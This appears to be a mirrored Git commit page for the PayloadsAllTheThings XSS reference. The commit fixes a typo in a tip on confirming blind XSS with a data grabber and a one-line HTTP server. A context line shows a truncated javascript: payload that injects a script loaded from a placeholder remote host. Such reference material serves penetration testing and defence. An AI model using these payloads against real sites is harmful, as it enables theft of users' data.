mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-12 14:22:47 +00:00
Fixed typo on "Tips" section
This commit is contained in:
parent
e9b38b8f43
commit
21c1690adf
1 changed files with 1 additions and 1 deletions
|
@ -454,7 +454,7 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
|
|||
|
||||
### Tips
|
||||
|
||||
You can use [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying an heavy blind XSS platform.
|
||||
You can use a [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying a heavy blind-XSS testing tool.
|
||||
|
||||
Eg. payload
|
||||
|
||||
|
|
Loading…
Reference in a new issue